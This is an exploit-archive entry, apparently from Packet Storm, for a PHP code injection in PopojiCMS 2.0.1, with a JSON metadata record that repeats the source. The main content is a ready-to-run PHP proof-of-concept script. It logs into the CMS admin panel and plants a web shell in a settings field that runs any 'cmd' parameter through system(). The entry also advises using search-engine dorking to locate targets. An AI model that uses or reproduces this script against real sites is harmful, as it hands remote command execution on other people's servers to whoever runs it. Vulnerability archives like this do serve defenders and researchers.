📄 PopojiCMS 2.0.1 Code Injection_PACKETSTORM:215641

Description

PopojiCMS version 2.0.1 remote PHP code injection proof of concept exploit...

Basic Information

ID PACKETSTORM:215641

Published Feb 16, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : PopojiCMS 2.0.1 PHP COde Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Exploiting the Web Execution Vulnerability in PopojiCMS

(Related : https://packetstorm.news/files/id/178630/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php exploit.php sitename username password

[+] PayLoad :

<?php

function exploit($url, $username, $password) {
$login_url = "{$url}/po-admin/route.php?mod=login&act=proclogin";
$login_data = array("username" => $username, "password" => $password);
$headers = array(
"Content-Type: application/x-www-form-urlencoded",
"Referer: {$url}/po-admin/index.php"
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$login_response = curl_exec($ch);

if (strpos($login_response, "Administrator PopojiCMS") !== false) {
echo "Login Successful!\n";
sleep(1); // 1 second wait
} else {
echo "Login Failed!\n";
return;
}

$edit_url = "{$url}/po-admin/route.php?mod=setting&act=metasocial";
$edit_data = array(
"meta_content" => "<html>
<body>
<form method=\"GET\" name=\"<?php echo basename(\$_SERVER['PHP_SELF']); ?>\">
<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">
<input type=\"SUBMIT\" value=\"Execute\">
</form>
<pre>
<?php
if(isset(\$_GET['cmd']))
{
system(\$_GET['cmd']);
}
?>
</pre>
</body>
</html>"
);

curl_setopt($ch, CURLOPT_URL, $edit_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($edit_data));
$edit_response = curl_exec($ch);

if (strpos($edit_response, "cmd") !== false) {
echo "Your shell is ready: {$url}\n";
sleep(1);
} else {
echo "Exploit Failed!\n";
return;
}

curl_close($ch);
}

if ($argc != 4) {
echo "Usage: php exploit.php sitename username password\n";
exit(1);
}

$url = $argv[1];
$username = $argv[2];
$password = $argv[3];

echo "Exploiting...\n";
sleep(1);
echo "Logging in...\n";
sleep(1);
exploit($url, $username, $password);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-16T17:45:21",
    "description": "PopojiCMS version 2.0.1 remote PHP code injection proof of concept exploit...",
    "published": "2026-02-16T00:00:00",
    "modified": "2026-02-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 PopojiCMS 2.0.1 Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215641",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : PopojiCMS 2.0.1 PHP COde Injection Vulnerability                                                                            |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip                                                         |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: Exploiting the Web Execution Vulnerability in PopojiCMS\n    \n       (Related : https://packetstorm.news/files/id/178630/ Related CVE numbers:  ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Usage: php exploit.php sitename username password\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    function exploit($url, $username, $password) {\n        $login_url = \"{$url}/po-admin/route.php?mod=login&act=proclogin\";\n        $login_data = array(\"username\" => $username, \"password\" => $password);\n        $headers = array(\n            \"Content-Type: application/x-www-form-urlencoded\",\n            \"Referer: {$url}/po-admin/index.php\"\n        );\n    \n        $ch = curl_init();\n        curl_setopt($ch, CURLOPT_URL, $login_url);\n        curl_setopt($ch, CURLOPT_POST, true);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));\n        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        $login_response = curl_exec($ch);\n    \n        if (strpos($login_response, \"Administrator PopojiCMS\") !== false) {\n            echo \"Login Successful!\\n\";\n            sleep(1); // 1 second wait\n        } else {\n            echo \"Login Failed!\\n\";\n            return;\n        }\n    \n        $edit_url = \"{$url}/po-admin/route.php?mod=setting&act=metasocial\";\n        $edit_data = array(\n            \"meta_content\" => \"<html>\n    <body>\n    <form method=\\\"GET\\\" name=\\\"<?php echo basename(\\$_SERVER['PHP_SELF']); ?>\\\">\n    <input type=\\\"TEXT\\\" name=\\\"cmd\\\" autofocus id=\\\"cmd\\\" size=\\\"80\\\">\n    <input type=\\\"SUBMIT\\\" value=\\\"Execute\\\">\n    </form>\n    <pre>\n    <?php\n    if(isset(\\$_GET['cmd']))\n    {\n        system(\\$_GET['cmd']);\n    }\n    ?>\n    </pre>\n    </body>\n    </html>\"\n        );\n    \n        curl_setopt($ch, CURLOPT_URL, $edit_url);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($edit_data));\n        $edit_response = curl_exec($ch);\n    \n        if (strpos($edit_response, \"cmd\") !== false) {\n            echo \"Your shell is ready: {$url}\\n\";\n            sleep(1);\n        } else {\n            echo \"Exploit Failed!\\n\";\n            return;\n        }\n    \n        curl_close($ch);\n    }\n    \n    if ($argc != 4) {\n        echo \"Usage: php exploit.php sitename username password\\n\";\n        exit(1);\n    }\n    \n    $url = $argv[1];\n    $username = $argv[2];\n    $password = $argv[3];\n    \n    echo \"Exploiting...\\n\";\n    sleep(1);\n    echo \"Logging in...\\n\";\n    sleep(1);\n    exploit($url, $username, $password);\n    \n    ?>\n    \n    \n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215641",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215641/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply